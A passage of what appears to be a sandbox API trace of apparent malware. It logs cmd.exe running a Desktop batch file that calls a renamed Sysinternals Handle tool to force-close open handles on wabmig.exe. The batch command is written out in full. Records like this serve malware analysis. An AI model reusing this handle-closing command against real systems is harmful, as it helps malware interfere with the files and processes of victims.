lpNumberOfCharsWritten=0x30ee04*=0x26) returned 1 [0188.803] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.803] GetFileType (hFile=0x7) returned 0x2 [0188.803] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.803] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f05c | out: lpMode=0x30f05c) returned 1 [0188.804] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.804] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x590cf0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30f088, lpReserved=0x0 | out: lpBuffer=0x590cf0*, lpNumberOfCharsWritten=0x30f088*=0x2) returned 1 [0188.804] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x30f094 | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0188.804] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.804] GetFileType (hFile=0x7) returned 0x2 [0188.805] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.805] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f054 | out: lpMode=0x30f054) returned 1 [0188.805] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.805] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x30f080, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30f080*=0x2d) returned 1 [0188.806] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x30f0b4 | out: _Buffer="\r\n") returned 2 [0188.806] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.806] GetFileType (hFile=0x7) returned 0x2 [0188.806] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.806] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f074 | out: lpMode=0x30f074) returned 1 [0188.807] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.807] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30f0a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30f0a0*=0x2) returned 1 [0188.807] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0188.807] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0188.807] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0188.807] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0188.807] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0188.807] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0188.807] GetConsoleTitleW (in: lpConsoleTitle=0x30ec24, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.808] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0188.808] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0188.808] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30e9e0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30e9d8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30e9d8*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0188.809] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30e77c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0188.809] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x30e77c, lpFilePart=0x30e778 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x30e778*=0x0) returned 0x26 [0188.809] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0188.809] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30e4f8 | out: lpFindFileData=0x30e4f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5a4440 [0188.809] FindClose (in: hFindFile=0x5a4440 | out: hFindFile=0x5a4440) returned 1 [0188.809] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x30e4f8 | out: lpFindFileData=0x30e4f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5a4440 [0188.810] FindClose (in: hFindFile=0x5a4440 | out: hFindFile=0x5a4440) returned 1 [0188.810] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0188.810] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x30e4f8 | out: lpFindFileData=0x30e4f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5a4440 [0188.810] FindClose (in: hFindFile=0x5a4440 | out: hFindFile=0x5a4440) returned 1 [0188.810] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0188.810] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0188.810] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0188.810] GetProcessHeap () returned 0x590000 [0188.810] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a5f80 | out: hHeap=0x590000) returned 1 [0188.810] GetEnvironmentStringsW () returned 0x5a4bf8* [0188.810] GetProcessHeap () returned 0x590000 [0188.810] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb7c) returned 0x5a5f80 [0188.811] FreeEnvironmentStringsW (penv=0x5a4bf8) returned 1 [0188.811] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0188.811] GetProcessHeap () returned 0x590000 [0188.811] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a43e0 | out: hHeap=0x590000) returned 1 [0188.811] GetProcessHeap () returned 0x590000 [0188.811] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4380 | out: hHeap=0x590000) returned 1 [0188.811] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.811] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0189.546] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.546] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0189.546] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.546] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0189.547] SetConsoleInputExeNameW () returned 0x1 [0189.547] GetConsoleOutputCP () returned 0x1b5 [0189.547] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0189.548] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x30f05c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0189.583] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0189.583] _get_osfhandle (_FileHandle=3) returned 0x78 [0189.583] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0189.583] GetProcessHeap () returned 0x590000 [0189.583] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4310 | out: hHeap=0x590000) returned 1 [0189.583] GetProcessHeap () returned 0x590000 [0189.583] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a42a0 | out: hHeap=0x590000) returned 1 [0189.583] GetProcessHeap () returned 0x590000 [0189.583] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4230 | out: hHeap=0x590000) returned 1 [0189.583] GetProcessHeap () returned 0x590000 [0189.583] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a41c0 | out: hHeap=0x590000) returned 1 [0189.583] GetProcessHeap () returned 0x590000 [0189.584] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590ce8 | out: hHeap=0x590000) returned 1 [0189.584] GetProcessHeap () returned 0x590000 [0189.584] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4160 | out: hHeap=0x590000) returned 1 [0189.584] GetProcessHeap () returned 0x590000 [0189.584] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x591230 | out: hHeap=0x590000) returned 1 [0189.584] GetProcessHeap () returned 0x590000 [0189.584] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5911b8 | out: hHeap=0x590000) returned 1 [0189.584] _get_osfhandle (_FileHandle=3) returned 0x78 [0189.584] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0189.584] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x30f040, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x30f040*=0x94, lpOverlapped=0x0) returned 1 [0189.584] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0190.424] _get_osfhandle (_FileHandle=3) returned 0x78 [0190.424] GetFileType (hFile=0x78) returned 0x1 [0190.424] _get_osfhandle (_FileHandle=3) returned 0x78 [0190.424] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0190.425] GetProcessHeap () returned 0x590000 [0190.425] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5b4af8 [0190.425] GetProcessHeap () returned 0x590000 [0190.425] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x5b8b10 [0190.429] GetProcessHeap () returned 0x590000 [0190.429] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x590ce8 [0190.429] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"wabmig.exe\"") returned 0xc [0190.429] GetProcessHeap () returned 0x590000 [0190.429] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590ce8 | out: hHeap=0x590000) returned 1 [0190.429] GetProcessHeap () returned 0x590000 [0190.429] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b8b10 | out: hHeap=0x590000) returned 1 [0190.429] GetProcessHeap () returned 0x590000 [0190.429] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4af8 | out: hHeap=0x590000) returned 1 [0190.440] _tell (_FileHandle=3) returned 226 [0190.440] _close (_FileHandle=3) returned 0 [0190.440] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x30ee14 | out: _Buffer="\r\n") returned 2 [0190.440] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.440] GetFileType (hFile=0x7) returned 0x2 [0190.441] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.441] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30edd4 | out: lpMode=0x30edd4) returned 1 [0190.442] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.442] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30ee00, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30ee00*=0x2) returned 1 [0191.848] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0191.848] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0191.848] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x30ee10 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0191.848] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x30ee10 | out: _Buffer=">") returned 1 [0191.848] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.848] GetFileType (hFile=0x7) returned 0x2 [0193.393] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.393] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30edd8 | out: lpMode=0x30edd8) returned 1 [0193.393] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.393] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x30ee04, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x30ee04*=0x26) returned 1 [0193.394] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x30f094 | out: _Buffer="FOR") returned 3 [0193.394] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.394] GetFileType (hFile=0x7) returned 0x2 [0193.394] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.394] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f054 | out: lpMode=0x30f054) returned 1 [0193.395] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.395] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x30f080, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30f080*=0x3) returned 1 [0193.395] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x30f094 | out: _Buffer=" /F") returned 3 [0193.395] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.395] GetFileType (hFile=0x7) returned 0x2 [0193.396] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.396] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f054 | out: lpMode=0x30f054) returned 1 [0193.397] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.397] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x30f080, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30f080*=0x3) returned 1 [0193.397] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x30f094 | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0193.397] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.397] GetFileType (hFile=0x7) returned 0x2 [0193.398] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.398] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f054 | out: lpMode=0x30f054) returned 1 [0193.398] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.398] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x30f080, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30f080*=0x20) returned 1 [0193.399] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x30f094 | out: _Buffer=" %I IN ") returned 7 [0193.399] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.399] GetFileType (hFile=0x7) returned 0x2 [0193.399] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.399] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f054 | out: lpMode=0x30f054) returned 1 [0193.399] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.400] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x30f080, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30f080*=0x7) returned 1 [0193.400] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x30f090 | out: _Buffer="(`tdq963ii.exe -accepteula \"wabmig.exe\" -nobanner`) DO ") returned 55 [0193.400] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.400] GetFileType (hFile=0x7) returned 0x2 [0193.400] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.400] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f050 | out: lpMode=0x30f050) returned 1 [0193.401] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.401] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x37, lpNumberOfCharsWritten=0x30f07c, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30f07c*=0x37) returned 1 [0193.401] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.401] GetFileType (hFile=0x7) returned 0x2 [0193.401] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.401] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f05c | out: lpMode=0x30f05c) returned 1 [0193.402] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.402] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x30f088, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x30f088*=0x1) returned 1 [0193.402] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.402] GetFileType (hFile=0x7) returned 0x2 [0193.402] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.402] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f040 | out: lpMode=0x30f040) returned 1 [0193.403] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.403] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5a42a0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x30f06c, lpReserved=0x0 | out: lpBuffer=0x5a42a0*, lpNumberOfCharsWritten=0x30f06c*=0xc) returned 1 [0193.403] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x30f078 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0193.403] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.403] GetFileType (hFile=0x7) returned 0x2 [0193.404] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.404] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f038 | out: lpMode=0x30f038) returned 1 [0193.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.404] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x30f064, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30f064*=0x26) returned 1 [0193.404] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x30f094 | out: _Buffer=") ") returned 2 [0193.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.405] GetFileType (hFile=0x7) returned 0x2 [0193.405] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.405] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f054 | out: lpMode=0x30f054) returned 1 [0193.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.405] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30f080, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30f080*=0x2) returned 1 [0193.406] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x30f0b4 | out: _Buffer="\r\n") returned 2 [0193.406] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.406] GetFileType (hFile=0x7) returned 0x2 [0193.406] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.406] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f074 | out: lpMode=0x30f074) returned 1 [0193.406] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.406] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30f0a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30f0a0*=0x2) returned 1 [0193.407] GetProcessHeap () returned 0x590000 [0193.407] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2c) returned 0x5a4328 [0193.407] GetProcessHeap () returned 0x590000 [0193.407] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xc) returned 0x590ce8 [0193.407] GetProcessHeap () returned 0x590000 [0193.407] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xc) returned 0x590d00 [0193.407] GetProcessHeap () returned 0x590000 [0193.407] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x590d18 [0193.407] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0193.407] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0193.408] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0193.408] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0193.408] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0193.408] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0193.408] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0193.408] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x30efd0, _Radix=0 | out: _EndPtr=0x30efd0*=",6 delims=: \"") returned 3 [0193.408] wcstol (in: _String="6 delims=: \"", _EndPtr=0x30efd0, _Radix=0 | out: _EndPtr=0x30efd0*=" delims=: \"") returned 6 [0193.408] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0193.408] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0193.408] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0193.408] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0193.408] GetProcessHeap () returned 0x590000 [0193.408] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590d18 | out: hHeap=0x590000) returned 1 [0193.408] GetProcessHeap () returned 0x590000 [0193.408] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x590d18 [0193.408] GetProcessHeap () returned 0x590000 [0193.408] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x590ce8, Size=0xe) returned 0x590d30 [0193.408] GetProcessHeap () returned 0x590000 [0193.408] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x590d30) returned 0xe [0193.408] GetProcessHeap () returned 0x590000 [0193.408] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x590d00, Size=0x14) returned 0x5a4360 [0193.409] GetProcessHeap () returned 0x590000 [0193.409] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a4360) returned 0x14 [0193.409] _wpopen (_Command="tdq963ii.exe -accepteula \"wabmig.exe\" -nobanner", _Mode="rb") returned 0x77032960 [0193.435] feof (_File=0x77032960) returned 0 [0193.435] ferror (_File=0x77032960) returned 0 [0193.435] GetProcessHeap () returned 0x590000 [0193.435] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x108) returned 0x5a4380 [0193.435] fgets (in: _Buf=0x5a4388, _MaxCount=256, _File=0x77032960 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77032960) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0201.255] feof (_File=0x77032960) returned 0 [0201.255] ferror (_File=0x77032960) returned 0 [0201.255] GetProcessHeap () returned 0x590000 [0201.255] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a4380, Size=0x208) returned 0x5a4380 [0201.255] GetProcessHeap () returned 0x590000 [0201.255] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a4380) returned 0x208 [0201.255] fgets (in: _Buf=0x5a43ce, _MaxCount=442, _File=0x77032960 | out: _Buf="\r\r\n", _File=0x77032960) returned="\r\r\n" [0201.255] feof (_File=0x77032960) returned 0 [0201.255] ferror (_File=0x77032960) returned 0 [0201.255] GetProcessHeap () returned 0x590000 [0201.255] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a4380, Size=0x308) returned 0x5a4380 [0201.256] GetProcessHeap () returned 0x590000 [0201.256] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a4380) returned 0x308 [0201.256] fgets (in: _Buf=0x5a43d1, _MaxCount=695, _File=0x77032960 | out: _Buf="", _File=0x77032960) returned 0x0 [0207.692] _pclose (in: _File=0x77032960 | out: _File=0x77032960) returned 1 [0207.694] GetProcessHeap () returned 0x590000 [0207.694] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a4380, Size=0x9e) returned 0x5a4380 [0207.695] GetProcessHeap () returned 0x590000 [0207.695] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a4380) returned 0x9e [0207.695] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x5a43d1, cbMultiByte=73, lpWideCharStr=0x5a4388, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0207.696] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x30ecc4 | out: _Buffer="\r\n") returned 2 [0207.696] _get_osfhandle (_FileHandle=1) returned 0x7 